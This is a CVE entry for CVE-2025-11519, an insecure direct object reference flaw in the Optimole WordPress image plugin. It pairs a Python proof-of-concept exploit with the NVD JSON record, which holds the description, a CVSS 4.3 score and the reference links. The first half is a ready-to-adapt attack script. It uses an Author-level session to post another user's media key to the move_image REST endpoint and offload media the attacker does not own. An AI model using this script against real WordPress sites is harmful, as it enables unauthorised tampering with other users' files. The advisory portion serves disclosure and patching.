CVE-2025-11519

import requests import json # CVE-2025-11519 - Optimole Plugin IDOR Vulnerability PoC # Vulnerability: Insecure Direct Object Reference in /wp-json/optml/v1/move_image # Required: Author-level or higher authenticated access TARGET_URL = "https://target-wordpress-site.com" # Authenticated session cookies (requires Author+ level access) COOKIES = { "wordpress_logged_in_xxx": "authenticated_session_cookie_value", "wordpress_sec_xxx": "secure_session_cookie_value" } def exploit_move_image(target_media_key): """ Exploit the IDOR vulnerability to offload media belonging to other users. Args: target_media_key: The media identifier (key) of the victim's media file """ endpoint = f"{TARGET_URL}/wp-json/optml/v1/move_image" # Construct the payload with the target media key payload = { "key": target_media_key # User-controlled parameter without authorization check } headers = { "Content-Type": "application/json", "X-WP-Nonce": "valid_wp_rest_nonce", # Valid REST API nonce "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } try: response = requests.post( endpoint, headers=headers, cookies=COOKIES, json=payload, verify=False ) if response.status_code == 200: print(f"[+] Successfully exploited IDOR on media key: {target_media_key}") print(f"[+] Response: {response.text}") return True else: print(f"[-] Failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": # Example: Target a media file belonging to another user # The media key can be obtained by enumerating media items via WP REST API target_key = "victim_media_attachment_key_or_id" exploit_move_image(target_key)

{"cve": {"id": "CVE-2025-11519", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.533", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Optimole – Optimize Images | Convert WebP & AVIF | CDN & Lazy Load | Image Optimization plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the /wp-json/optml/v1/move_image REST API endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to offload media that doesn't belong to them."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378645%40optimole-wp&new=3378645%40optimole-wp&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/CVE-2025-11519", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9288ed60-b14b-4188-84d4-efe770093551?source=cve", "source": "[email protected]"}]}}